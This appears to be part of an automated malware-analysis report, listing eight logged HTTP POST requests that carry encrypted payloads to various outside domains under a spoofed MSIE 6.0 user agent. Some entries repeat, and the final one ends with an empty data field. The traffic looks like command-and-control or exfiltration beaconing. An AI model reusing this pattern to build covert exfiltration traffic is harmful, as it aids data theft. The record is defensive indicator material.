              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 6a 36 57 5a 65 58 6f 30 31 73 67 56 38 6d 67 4f 48 54 6b 69 36 4c 32 6e 52 45 6a 71 4c 56 42 78 54 6f 5a 52 7a 65 73 71 56 36 72 46 71 54 72 6b 33 36 5a 4a 4f 50 44 77 76 64 30 63 77 48 7a 67 77 6c 66 74 47 33 34 51 70 6b 72 37 61 36 50 66 72 78 64 65 73 32 36 39 54 46 79 44 4c 52 68 2b 6a 4c 4e 33 71 59 49 41 52 42 47 67 62 32 50 52 67 4b 66 42 53 34 61 4b 36 6f 6a 47 32 53 33 50 7a 4b 35 66 41 56 61 32 5a 36 53 51 61 39 50 4f 37 78 5a 50 32 75 6e 32 65 41 73 42 54 57 56 6a 4c 73 56 69 63 41 44 4d 69 54 2b 4a 46 2f 52 53 54 4f 62 6a 62 43 4f 7a 61 38 69 43 65 76 39 4c 5a 45 4d 41 57 41 77 39 4f 70 68 77 34 31 63 76 74 74 51 2f 59 72 38 53 4c 4d 5a 44 37 50 42 77 43 56 66 74 42 68 50 6e 57 79 36 59 39 4c 6d 41 32 38 52 42 57 42 76 56 30 4a 65 42 49 79 4d 45 6f 54 30 77 2f 4f 61 49 4a 36 53 6e 57 62 32 43 41 4c 72 4a 47 75 47 4b 6e 63 57 6a 31 73 5a 67 52 58 32 46 57 51 76 71 4a 6d 31 51 59 64 41 59 69 74 6c 50 59 6a 31 75 43 2b 77 79 56 68 43 69 56 4e 71 69 31 6e 6d 47 75 57 54 31 52 78 59 6e 73 77 4d 6c 45 65 36 58 4b 59 73 42 68 4e 4c 54 2f 63 36 50 4c 74 41 45 58 68 4b 36 6f 75 7a 6e 65 41 6a 58 57 50 43 46 34 6c 4e 6c 54 6c 34 61 74 38 64 50 42 34 48 6a 58 50 72 49 4e 45 66 39 2b 35 36 37 78 75 6c 74 64 62 34 63 33 78 66 5a 45 64 34 58 49 37 72 6f 77 35 50 4b 6d 58 66 64 76 69 68 4d 77 77 73 57 31 59 47 35 47 4e 65 67 56 7a 76 71 6c 62 78 4a 69 61 31 6d 57 79 79 54 39 34 72 57 5a 4d 66 6c 4d 6b 46 76 4b 39 44 2f 44 46 36 45 68 6b 4c 47 67 2b 7a 36 52 58 67 50 57 67 6a 5a 55 47 32 75 73 33 6e 6a 52 57 39 35 72 63 65 6e 61 73 68 4a 34 4d 57 31 75 62 58 4f 6f 77 42 67 49 32 39 2f 6b 7a 4f 47 65 62 36 78 4c 38 39 50 56 4b 5a 71 66 6c 4e 51 37 76 4e 49 4a 51 3d 3d Data Ascii: j6WZeXo01sgV8mgOHTki6L2nREjqLVBxToZRzesqV6rFqTrk36ZJOPDwvd0cwHzgwlftG34Qpkr7a6Pfrxdes269TFyDLRh+jLN3qYIARBGgb2PRgKfBS4aK6ojG2S3PzK5fAVa2Z6SQa9PO7xZP2un2eAsBTWVjLsVicADMiT+JF/RSTObjbCOza8iCev9LZEMAWAw9Ophw41cvttQ/Yr8SLMZD7PBwCVftBhPnWy6Y9LmA28RBWBvV0JeBIyMEoT0w/OaIJ6SnWb2CALrJGuGKncWj1sZgRX2FWQvqJm1QYdAYitlPYj1uC+wyVhCiVNqi1nmGuWT1RxYnswMlEe6XKYsBhNLT/c6PLtAEXhK6ouzneAjXWPCF4lNlTl4at8dPB4HjXPrINEf9+567xultdb4c3xfZEd4XI7row5PKmXfdvihMwwsW1YG5GNegVzvqlbxJia1mWyyT94rWZMflMkFvK9D/DF6EhkLGg+z6RXgPWgjZUG2us3njRW95rcenashJ4MW1ubXOowBgI29/kzOGeb6xL89PVKZqflNQ7vNIJQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 32 58 48 4c 65 64 7a 6c 7a 63 67 5a 31 57 47 65 42 30 66 31 36 6d 2f 31 39 2b 48 30 50 31 71 73 30 4b 7a 2b 6b 75 38 77 30 55 72 73 33 4d 4a 69 47 53 38 4e 4c 46 75 79 38 44 43 75 49 6c 5a 51 63 70 5a 69 48 71 6f 50 68 6a 6a 6a 4a 52 66 57 52 71 50 2f 64 69 50 65 73 75 43 61 4e 49 43 58 31 35 45 61 68 46 7a 43 30 67 75 67 6b 52 67 49 30 70 41 64 48 34 68 41 49 55 37 71 6c 6d 4e 45 64 42 64 4f 6c 35 38 63 55 72 45 76 79 52 67 68 39 57 45 4e 6c 44 31 67 48 6a 73 2f 47 67 30 41 37 41 53 51 4f 58 59 48 51 2f 2b 79 78 57 6c 45 4e 57 35 71 6e 34 37 70 37 75 66 42 31 6c 2b 45 42 6c 2f 39 5a 70 48 54 46 71 4c 6a 59 35 7a 42 55 65 50 2b 31 34 75 71 66 44 53 55 44 4e 30 4d 69 71 30 66 2b 4a 4b 6c 48 33 69 61 78 39 7a 53 58 61 31 74 38 36 2b 49 62 68 51 47 76 39 73 67 4c 7a 5a 46 77 63 49 59 50 68 46 55 69 2b 75 6e 46 79 57 35 47 59 6c 57 6e 59 6e 65 6e 34 41 44 43 42 72 62 61 36 56 47 71 55 5a 6d 4b 58 6a 44 67 6c 65 63 44 78 77 59 45 42 44 6b 37 44 2b 6b 42 51 41 50 4e 61 6e 32 58 45 33 61 71 65 51 33 47 37 68 66 65 41 79 73 37 49 4c 64 2f 33 2b 52 6e 68 31 75 6b 2b 33 74 77 71 7a 57 75 47 4d 67 6b 62 75 71 48 71 70 5a 44 2b 4d 35 69 35 41 76 76 6f 63 76 6e 4a 4f 6b 50 50 35 44 45 55 31 79 4e 72 52 78 79 57 51 69 6b 54 74 53 4a 65 76 7a 68 5a 68 44 55 61 31 51 44 4a 66 7a 32 62 43 55 31 6b 6b 6e 4d 42 7a 57 33 49 36 7a 37 54 4a 75 50 78 4a 44 34 39 59 73 79 6a 6c 7a 4c 36 43 37 69 75 62 71 6b 2f 39 64 36 55 58 52 69 52 30 61 2f 4d 39 73 31 2b 58 2f 6e 51 6b 44 6b 34 62 6f 42 74 57 6b 63 4a 48 30 6d 4c 52 53 33 68 69 41 37 67 2f 56 43 67 73 58 37 47 54 50 69 6d 56 4f 46 70 37 6b 6a 39 61 35 4d 66 62 69 37 34 6d 6e 49 63 2b 77 43 71 6d 46 70 6d 2f 42 78 79 66 41 71 39 6b 6c 4a 58 37 72 6f 57 77 3d Data Ascii: 2XHLedzlzcgZ1WGeB0f16m/19+H0P1qs0Kz+ku8w0Urs3MJiGS8NLFuy8DCuIlZQcpZiHqoPhjjjJRfWRqP/diPesuCaNICX15EahFzC0gugkRgI0pAdH4hAIU7qlmNEdBdOl58cUrEvyRgh9WENlD1gHjs/Gg0A7ASQOXYHQ/+yxWlENW5qn47p7ufB1l+EBl/9ZpHTFqLjY5zBUeP+14uqfDSUDN0Miq0f+JKlH3iax9zSXa1t86+IbhQGv9sgLzZFwcIYPhFUi+unFyW5GYlWnYnen4ADCBrba6VGqUZmKXjDglecDxwYEBDk7D+kBQAPNan2XE3aqeQ3G7hfeAys7ILd/3+Rnh1uk+3twqzWuGMgkbuqHqpZD+M5i5AvvocvnJOkPP5DEU1yNrRxyWQikTtSJevzhZhDUa1QDJfz2bCU1kknMBzW3I6z7TJuPxJD49YsyjlzL6C7iubqk/9d6UXRiR0a/M9s1+X/nQkDk4boBtWkcJH0mLRS3hiA7g/VCgsX7GTPimVOFp7kj9a5Mfbi74mnIc+wCqmFpm/BxyfAq9klJX7roWw=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 51 2b 37 56 57 46 4e 30 33 63 67 49 2f 47 6d 72 47 75 30 68 43 50 7a 46 64 31 34 35 67 65 64 4a 4e 37 2b 61 4b 6a 56 50 70 4b 77 47 6d 74 49 68 44 66 50 31 4a 66 45 6c 2f 6c 35 4e 4d 71 6a 76 69 45 78 64 4e 33 30 47 54 37 50 2f 58 35 54 35 63 48 38 53 47 56 35 69 72 75 58 74 4f 54 36 38 6a 56 68 34 31 64 31 6a 54 36 52 6e 75 39 6e 4a 7a 33 6c 53 56 6b 67 4b 53 4b 34 54 59 39 62 67 36 50 32 67 32 42 42 79 4c 48 56 68 2b 6d 6a 42 59 4c 2b 38 59 48 45 64 79 79 6a 59 59 66 39 41 54 71 50 31 71 57 59 79 2f 50 52 73 35 49 6b 4c 76 34 55 4d 30 4f 67 46 51 46 55 43 79 59 36 35 50 56 2b 66 77 59 76 46 68 73 4b 6f 55 31 34 2f 6f 4b 32 39 50 65 35 4b 48 74 34 79 39 46 6f 4f 72 34 70 33 68 6f 6a 30 75 42 77 47 62 2b 6f 4b 79 36 58 34 67 46 47 38 5a 74 64 61 4f 4e 78 36 2f 59 38 54 78 6b 47 79 34 48 4c 48 32 6c 6b 39 68 72 7a 50 31 6a 67 69 6c 6c 6d 61 46 66 34 36 32 30 6c 46 42 66 68 76 48 6d 4f 4b 4c 7a 70 74 4c 78 4a 54 52 6a 52 63 72 7a 70 52 65 59 66 64 2f 2b 57 36 2b 50 42 4a 6f 67 6d 6c 38 61 49 4a 32 47 6e 6d 72 4a 66 56 38 37 68 30 34 67 6d 69 4e 71 5a 70 53 39 66 67 2b 34 35 6e 78 78 56 69 70 6e 61 59 76 36 71 7a 4e 65 39 63 68 32 6c 6e 74 6e 35 66 75 75 7a 62 38 38 36 52 2f 4f 43 65 44 4d 55 59 73 4a 66 37 4f 57 44 37 77 58 41 46 4f 2f 74 67 51 46 6a 6b 70 67 76 71 4e 5a 61 32 61 77 6e 49 31 44 54 4f 5a 36 32 55 6d 31 66 71 77 71 6e 2f 68 73 69 79 2f 51 32 4e 72 52 71 72 69 76 73 4c 65 5a 6e 52 62 64 74 43 78 78 70 61 2b 49 48 37 6a 79 52 61 30 6c 69 74 79 4e 62 47 47 4c 38 6b 5a 67 6c 57 6f 31 70 31 35 4a 7a 36 6c 51 4e 5a 78 55 4f 4a 7a 50 52 6f 75 32 43 71 33 45 5a 64 6c 77 3d 3d Data Ascii: Q+7VWFN03cgI/GmrGu0hCPzFd145gedJN7+aKjVPpKwGmtIhDfP1JfEl/l5NMqjviExdN30GT7P/X5T5cH8SGV5iruXtOT68jVh41d1jT6Rnu9nJz3lSVkgKSK4TY9bg6P2g2BByLHVh+mjBYL+8YHEdyyjYYf9ATqP1qWYy/PRs5IkLv4UM0OgFQFUCyY65PV+fwYvFhsKoU14/oK29Pe5KHt4y9FoOr4p3hoj0uBwGb+oKy6X4gFG8ZtdaONx6/Y8TxkGy4HLH2lk9hrzP1jgillmaFf4620lFBfhvHmOKLzptLxJTRjRcrzpReYfd/+W6+PBJogml8aIJ2GnmrJfV87h04gmiNqZpS9fg+45nxxVipnaYv6qzNe9ch2lntn5fuuzb886R/OCeDMUYsJf7OWD7wXAFO/tgQFjkpgvqNZa2awnI1DTOZ62Um1fqwqn/hsiy/Q2NrRqrivsLeZnRbdtCxxpa+IH7jyRa0lityNbGGL8kZglWo1p15Jz6lQNZxUOJzPRou2Cq3EZdlw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 2b 70 71 43 65 31 78 45 31 73 67 50 58 42 36 7a 68 78 53 4a 65 2b 39 62 64 42 56 30 4d 47 70 33 55 4b 75 42 54 39 47 4f 76 4e 66 67 6f 50 37 48 74 58 75 6c 2f 2f 6c 55 6f 33 64 74 31 48 47 61 41 6b 30 61 45 76 56 4b 65 47 41 43 57 32 41 45 74 71 5a 59 4b 74 36 78 55 65 34 63 6d 6a 55 61 30 4b 55 79 75 54 36 2b 56 61 4b 56 74 43 6e 4e 73 6f 4c 55 4b 35 61 54 78 55 47 7a 53 6d 70 50 4e 64 79 33 45 48 31 48 48 31 62 77 56 64 41 69 4e 79 4b 63 55 64 35 56 4f 36 47 4d 5a 78 33 47 33 6b 65 66 61 65 34 41 37 4d 44 77 63 55 2b 66 75 6b 69 72 34 4b 74 39 4f 62 59 72 6b 4a 70 2f 57 51 49 56 52 72 57 46 6e 55 52 4c 4f 70 44 57 61 62 43 65 75 73 6d 4a 53 75 6d 73 68 49 5a 50 47 48 65 63 4e 67 6e 57 75 44 6b 56 38 65 2b 58 41 70 74 37 33 2f 72 61 76 74 4d 4d 54 71 75 2f 5a 33 39 59 4d 33 51 32 47 57 59 5a 73 4b 43 4d 66 39 68 63 4e 67 44 32 50 35 32 69 76 50 32 72 68 42 79 34 4d 37 4f 35 51 6d 49 75 42 73 33 38 42 36 5a 59 77 59 55 5a 79 6d 76 4b 42 59 54 56 2b 6a 63 45 33 41 4d 58 48 68 78 32 39 32 59 65 56 32 36 46 7a 57 4c 45 68 64 34 35 31 4b 62 50 58 47 31 39 51 70 59 7a 6d 50 2b 2f 76 71 38 7a 4a 6e 4c 6b 61 59 61 43 50 33 74 56 78 39 4a 2b 58 68 76 6a 45 68 52 69 54 65 51 41 38 70 4e 43 53 53 4e 78 76 56 50 41 78 6e 44 51 4f 42 44 41 6c 34 33 49 6a 66 38 4c 4b 35 64 31 4b 41 4e 4a 5a 77 6d 52 47 53 46 65 44 55 59 39 4b 5a 59 62 35 6e 6f 59 6b 48 6a 49 4e 75 2f 52 66 6f 52 6d 6a 30 4a 38 39 46 64 4d 50 2f 78 75 55 50 2b 6b 75 53 2b 77 74 65 38 38 77 73 35 31 49 6f 6b 57 66 53 34 57 4d 4e 43 48 45 48 55 4c 57 75 68 4c 59 47 6e 56 61 66 54 33 4e 36 59 48 57 43 59 5a 37 63 54 5a 76 6f 69 62 7a 4c 6b 6c 77 62 58 43 6d 74 32 39 55 73 51 6d 7a 31 41 3d Data Ascii: +pqCe1xE1sgPXB6zhxSJe+9bdBV0MGp3UKuBT9GOvNfgoP7HtXul//lUo3dt1HGaAk0aEvVKeGACW2AEtqZYKt6xUe4cmjUa0KUyuT6+VaKVtCnNsoLUK5aTxUGzSmpPNdy3EH1HH1bwVdAiNyKcUd5VO6GMZx3G3kefae4A7MDwcU+fukir4Kt9ObYrkJp/WQIVRrWFnURLOpDWabCeusmJSumshIZPGHecNgnWuDkV8e+XApt73/ravtMMTqu/Z39YM3Q2GWYZsKCMf9hcNgD2P52ivP2rhBy4M7O5QmIuBs38B6ZYwYUZymvKBYTV+jcE3AMXHhx292YeV26FzWLEhd451KbPXG19QpYzmP+/vq8zJnLkaYaCP3tVx9J+XhvjEhRiTeQA8pNCSSNxvVPAxnDQOBDAl43Ijf8LK5d1KANJZwmRGSFeDUY9KZYb5noYkHjINu/RfoRmj0J89FdMP/xuUP+kuS+wte88ws51IokWfS4WMNCHEHULWuhLYGnVafT3N6YHWCYZ7cTZvoibzLklwbXCmt29UsQmz1A=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 41 4b 46 53 43 2b 72 76 32 73 67 65 63 4f 64 56 7a 56 37 2b 47 4b 32 67 51 41 38 61 31 6c 4f 6d 76 76 67 52 6e 55 49 4f 43 41 6c 32 47 49 71 74 51 77 70 7a 56 48 67 65 72 44 61 58 44 67 35 44 2b 55 63 72 66 58 59 72 58 39 30 52 6c 32 71 76 33 72 42 44 65 76 74 77 72 30 62 5a 76 77 79 64 64 36 54 37 32 4f 2b 6b 51 4f 59 4a 68 71 2f 31 43 4e 51 79 72 75 78 4e 6b 42 36 47 67 36 77 2b 62 6a 52 52 5a 7a 77 2f 41 6d 64 56 39 36 76 4e 39 39 58 63 50 68 2f 70 4f 63 69 6d 6c 48 49 77 4c 37 4d 46 4a 68 52 44 79 70 49 77 42 47 62 79 74 63 6d 7a 30 79 66 4c 6c 64 37 57 55 50 5a 36 4d 4f 46 69 46 78 46 74 30 53 71 74 72 71 4c 54 57 6e 70 4a 55 47 59 33 67 53 7a 59 44 73 34 32 52 36 30 70 2b 57 6d 57 6c 78 34 4d 6d 7a 67 54 4f 64 53 51 43 4e 44 67 70 7a 62 37 30 37 44 33 75 4a 4f 78 66 35 4a 52 56 53 72 2b 47 73 38 72 4c 76 38 6b 45 31 47 6c 53 31 70 50 64 30 6d 43 6d 31 65 47 6c 6f 47 71 61 38 61 31 67 69 64 66 46 39 67 5a 33 64 65 69 2b 66 6e 70 55 41 52 36 4b 63 54 55 32 41 2b 73 63 65 61 79 46 4f 6a 6f 67 39 48 73 46 2f 4a 31 2b 37 6b 65 38 59 76 4f 44 6b 4f 41 61 41 6a 6d 4a 30 72 58 49 2f 71 5a 50 39 35 59 6e 30 72 4e 4a 30 64 39 6a 44 52 33 43 51 74 51 38 49 34 37 69 4b 4c 45 51 64 59 75 47 37 6d 70 41 62 63 4d 67 42 45 71 57 57 73 41 41 62 54 73 4f 79 49 51 2f 62 43 4d 67 31 66 61 67 39 2b 7a 71 4d 4d 6f 4f 46 76 4d 4c 6d 70 6a 7a 4a 2b 4b 75 42 69 54 33 54 4b 4f 68 51 36 44 46 58 36 52 59 32 51 72 41 66 48 4c 4e 76 61 32 36 57 6e 51 73 39 38 34 67 53 38 31 75 63 51 4d 79 4c 4e 6e 2b 47 53 47 50 58 34 57 52 77 31 38 79 33 42 53 65 6b 4f 4e 33 61 32 47 55 41 53 58 4c 55 48 7a 49 43 38 70 51 58 4e 64 37 72 45 58 45 32 7a 4b 33 30 6b 34 4e 4f 67 32 50 49 75 69 41 6c 68 32 47 69 71 32 70 43 48 2b 67 4c 59 54 33 5a 62 64 64 63 4e 57 79 56 42 62 4f 41 3d 3d Data Ascii: AKFSC+rv2sgecOdVzV7+GK2gQA8a1lOmvvgRnUIOCAl2GIqtQwpzVHgerDaXDg5D+UcrfXYrX90Rl2qv3rBDevtwr0bZvwydd6T72O+kQOYJhq/1CNQyruxNkB6Gg6w+bjRRZzw/AmdV96vN99XcPh/pOcimlHIwL7MFJhRDypIwBGbytcmz0yfLld7WUPZ6MOFiFxFt0SqtrqLTWnpJUGY3gSzYDs42R60p+WmWlx4MmzgTOdSQCNDgpzb707D3uJOxf5JRVSr+Gs8rLv8kE1GlS1pPd0mCm1eGloGqa8a1gidfF9gZ3dei+fnpUAR6KcTU2A+sceayFOjog9HsF/J1+7ke8YvODkOAaAjmJ0rXI/qZP95Yn0rNJ0d9jDR3CQtQ8I47iKLEQdYuG7mpAbcMgBEqWWsAAbTsOyIQ/bCMg1fag9+zqMMoOFvMLmpjzJ+KuBiT3TKOhQ6DFX6RY2QrAfHLNva26WnQs984gS81ucQMyLNn+GSGPX4WRw18y3BSekON3a2GUASXLUHzIC8pQXNd7rEXE2zK30k4NOg2PIuiAlh2Giq2pCH+gLYT3ZbddcNWyVBbOA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 73 72 4f 62 7a 38 42 50 34 63 67 33 58 4a 67 42 6b 34 42 6d 2f 2f 50 4d 74 6f 36 6f 69 63 32 48 39 42 70 4e 4d 36 70 7a 2b 4e 32 44 78 6e 52 6e 45 2f 30 61 48 5a 71 64 77 6a 69 6f 36 64 74 79 6a 6b 67 53 75 4a 57 77 48 4d 71 30 6d 2b 54 72 34 35 41 69 39 31 5a 44 51 56 62 7a 79 6d 6b 42 6a 70 61 6f 47 77 30 4e 32 75 57 6f 7a 70 2f 6f 38 4c 44 76 39 62 77 41 35 4b 4a 7a 75 42 55 5a 41 63 59 64 61 41 56 59 66 79 70 66 44 68 38 6a 77 51 31 43 41 59 6a 36 73 63 43 33 59 6e 79 79 68 72 6c 4f 70 6f 34 72 33 4a 35 55 55 59 48 55 65 4a 5a 31 4f 72 44 75 4c 79 43 62 41 52 36 66 38 2b 67 39 64 6d 50 30 4a 76 31 7a 6f 71 6d 4e 49 69 49 5a 4e 47 59 36 6c 4c 6e 63 6a 4a 45 39 6c 4b 66 36 44 56 39 4c 52 48 6c 41 77 63 2f 4b 69 4f 66 79 67 50 45 33 6d 75 35 45 6c 69 49 43 6f 37 6e 62 77 4e 2f 39 45 36 39 58 78 6d 79 38 6c 56 59 47 64 77 35 66 64 4d 7a 62 72 48 49 56 73 76 5a 39 43 35 73 43 33 30 61 66 69 59 41 45 66 43 42 2b 34 66 30 2b 4b 45 65 30 61 75 2f 76 77 34 32 70 2b 75 4e 66 73 51 56 74 49 62 56 44 45 2f 2f 79 47 66 44 37 55 56 66 4e 56 59 47 4b 74 33 62 55 71 45 6e 73 68 34 42 49 53 42 48 59 38 43 6b 7a 37 6a 38 6a 50 7a 45 51 4e 71 39 4b 70 6e 41 6a 5a 57 45 63 4b 51 4c 38 74 2b 71 44 55 47 63 67 6d 4e 4b 52 2b 37 58 32 66 42 59 38 75 37 2f 35 56 31 33 52 73 78 65 74 68 44 59 50 5a 2f 54 4b 46 68 73 72 78 63 4e 32 49 79 4f 43 4d 38 53 36 54 64 6f 5a 4b 5a 72 70 7a 57 52 33 36 30 44 45 55 75 52 4d 4c 57 46 33 64 51 35 42 68 75 78 39 62 4c 77 45 30 72 39 71 76 64 66 54 33 77 79 64 66 78 34 64 61 54 7a 6f 71 52 7a 6b 38 50 4a 2f 36 6c 63 4a 67 77 71 39 4e 37 61 36 67 44 49 6e 52 47 6b 61 63 4d 63 6a 38 6e 6d 39 44 55 47 38 53 50 2b 30 Data Ascii: srObz8BP4cg3XJgBk4Bm//PMto6oic2H9BpNM6pz+N2DxnRnE/0aHZqdwjio6dtyjkgSuJWwHMq0m+Tr45Ai91ZDQVbzymkBjpaoGw0N2uWozp/o8LDv9bwA5KJzuBUZAcYdaAVYfypfDh8jwQ1CAYj6scC3YnyyhrlOpo4r3J5UUYHUeJZ1OrDuLyCbAR6f8+g9dmP0Jv1zoqmNIiIZNGY6lLncjJE9lKf6DV9LRHlAwc/KiOfygPE3mu5EliICo7nbwN/9E69Xxmy8lVYGdw5fdMzbrHIVsvZ9C5sC30afiYAEfCB+4f0+KEe0au/vw42p+uNfsQVtIbVDE//yGfD7UVfNVYGKt3bUqEnsh4BISBHY8Ckz7j8jPzEQNq9KpnAjZWEcKQL8t+qDUGcgmNKR+7X2fBY8u7/5V13RsxethDYPZ/TKFhsrxcN2IyOCM8S6TdoZKZrpzWR360DEUuRMLWF3dQ5Bhux9bLwE0r9qvdfT3wydfx4daTzoqRzk8PJ/6lcJgwq9N7a6gDInRGkacMcj8nm9DUG8SP+0
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 2b 70 71 43 65 31 78 45 31 73 67 50 58 42 36 7a 68 78 53 4a 65 2b 39 62 64 42 56 30 4d 47 70 33 55 4b 75 42 54 39 47 4f 76 4e 66 67 6f 50 37 48 74 58 75 6c 2f 2f 6c 55 6f 33 64 74 31 48 47 61 41 6b 30 61 45 76 56 4b 65 47 41 43 57 32 41 45 74 71 5a 59 4b 74 36 78 55 65 34 63 6d 6a 55 61 30 4b 55 79 75 54 36 2b 56 61 4b 56 74 43 6e 4e 73 6f 4c 55 4b 35 61 54 78 55 47 7a 53 6d 70 50 4e 64 79 33 45 48 31 48 48 31 62 77 56 64 41 69 4e 79 4b 63 55 64 35 56 4f 36 47 4d 5a 78 33 47 33 6b 65 66 61 65 34 41 37 4d 44 77 63 55 2b 66 75 6b 69 72 34 4b 74 39 4f 62 59 72 6b 4a 70 2f 57 51 49 56 52 72 57 46 6e 55 52 4c 4f 70 44 57 61 62 43 65 75 73 6d 4a 53 75 6d 73 68 49 5a 50 47 48 65 63 4e 67 6e 57 75 44 6b 56 38 65 2b 58 41 70 74 37 33 2f 72 61 76 74 4d 4d 54 71 75 2f 5a 33 39 59 4d 33 51 32 47 57 59 5a 73 4b 43 4d 66 39 68 63 4e 67 44 32 50 35 32 69 76 50 32 72 68 42 79 34 4d 37 4f 35 51 6d 49 75 42 73 33 38 42 36 5a 59 77 59 55 5a 79 6d 76 4b 42 59 54 56 2b 6a 63 45 33 41 4d 58 48 68 78 32 39 32 59 65 56 32 36 46 7a 57 4c 45 68 64 34 35 31 4b 62 50 58 47 31 39 51 70 59 7a 6d 50 2b 2f 76 71 38 7a 4a 6e 4c 6b 61 59 61 43 50 33 74 56 78 39 4a 2b 58 68 76 6a 45 68 52 69 54 65 51 41 38 70 4e 43 53 53 4e 78 76 56 50 41 78 6e 44 51 4f 42 44 41 6c 34 33 49 6a 66 38 4c 4b 35 64 31 4b 41 4e 4a 5a 77 6d 52 47 53 46 65 44 55 59 39 4b 5a 59 62 35 6e 6f 59 6b 48 6a 49 4e 75 2f 52 66 6f 52 6d 6a 30 4a 38 39 46 64 4d 50 2f 78 75 55 50 2b 6b 75 53 2b 77 74 65 38 38 77 73 35 31 49 6f 6b 57 66 53 34 57 4d 4e 43 48 45 48 55 4c 57 75 68 4c 59 47 6e 56 61 66 54 33 4e 36 59 48 57 43 59 5a 37 63 54 5a 76 6f 69 62 7a 4c 6b 6c 77 62 58 43 6d 74 32 39 55 73 51 6d 7a 31 41 3d Data Ascii: +pqCe1xE1sgPXB6zhxSJe+9bdBV0MGp3UKuBT9GOvNfgoP7HtXul//lUo3dt1HGaAk0aEvVKeGACW2AEtqZYKt6xUe4cmjUa0KUyuT6+VaKVtCnNsoLUK5aTxUGzSmpPNdy3EH1HH1bwVdAiNyKcUd5VO6GMZx3G3kefae4A7MDwcU+fukir4Kt9ObYrkJp/WQIVRrWFnURLOpDWabCeusmJSumshIZPGHecNgnWuDkV8e+XApt73/ravtMMTqu/Z39YM3Q2GWYZsKCMf9hcNgD2P52ivP2rhBy4M7O5QmIuBs38B6ZYwYUZymvKBYTV+jcE3AMXHhx292YeV26FzWLEhd451KbPXG19QpYzmP+/vq8zJnLkaYaCP3tVx9J+XhvjEhRiTeQA8pNCSSNxvVPAxnDQOBDAl43Ijf8LK5d1KANJZwmRGSFeDUY9KZYb5noYkHjINu/RfoRmj0J89FdMP/xuUP+kuS+wte88ws51IokWfS4WMNCHEHULWuhLYGnVafT3N6YHWCYZ7cTZvoibzLklwbXCmt29UsQmz1A=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 51 2b 37 56 57 46 4e 30 33 63 67 49 2f 47 6d 72 47 75 30 68 43 50 7a 46 64 31 34 35 67 65 64 4a 4e 37 2b 61 4b 6a 56 50 70 4b 77 47 6d 74 49 68 44 66 50 31 4a 66 45 6c 2f 6c 35 4e 4d 71 6a 76 69 45 78 64 4e 33 30 47 54 37 50 2f 58 35 54 35 63 48 38 53 47 56 35 69 72 75 58 74 4f 54 36 38 6a 56 68 34 31 64 31 6a 54 36 52 6e 75 39 6e 4a 7a 33 6c 53 56 6b 67 4b 53 4b 34 54 59 39 62 67 36 50 32 67 32 42 42 79 4c 48 56 68 2b 6d 6a 42 59 4c 2b 38 59 48 45 64 79 79 6a 59 59 66 39 41 54 71 50 31 71 57 59 79 2f 50 52 73 35 49 6b 4c 76 34 55 4d 30 4f 67 46 51 46 55 43 79 59 36 35 50 56 2b 66 77 59 76 46 68 73 4b 6f 55 31 34 2f 6f 4b 32 39 50 65 35 4b 48 74 34 79 39 46 6f 4f 72 34 70 33 68 6f 6a 30 75 42 77 47 62 2b 6f 4b 79 36 58 34 67 46 47 38 5a 74 64 61 4f 4e 78 36 2f 59 38 54 78 6b 47 79 34 48 4c 48 32 6c 6b 39 68 72 7a 50 31 6a 67 69 6c 6c 6d 61 46 66 34 36 32 30 6c 46 42 66 68 76 48 6d 4f 4b 4c 7a 70 74 4c 78 4a 54 52 6a 52 63 72 7a 70 52 65 59 66 64 2f 2b 57 36 2b 50 42 4a 6f 67 6d 6c 38 61 49 4a 32 47 6e 6d 72 4a 66 56 38 37 68 30 34 67 6d 69 4e 71 5a 70 53 39 66 67 2b 34 35 6e 78 78 56 69 70 6e 61 59 76 36 71 7a 4e 65 39 63 68 32 6c 6e 74 6e 35 66 75 75 7a 62 38 38 36 52 2f 4f 43 65 44 4d 55 59 73 4a 66 37 4f 57 44 37 77 58 41 46 4f 2f 74 67 51 46 6a 6b 70 67 76 71 4e 5a 61 32 61 77 6e 49 31 44 54 4f 5a 36 32 55 6d 31 66 71 77 71 6e 2f 68 73 69 79 2f 51 32 4e 72 52 71 72 69 76 73 4c 65 5a 6e 52 62 64 74 43 78 78 70 61 2b 49 48 37 6a 79 52 61 30 6c 69 74 79 4e 62 47 47 4c 38 6b 5a 67 6c 57 6f 31 70 31 35 4a 7a 36 6c 51 4e 5a 78 55 4f 4a 7a 50 52 6f 75 32 43 71 33 45 5a 64 6c 77 3d 3d Data Ascii: 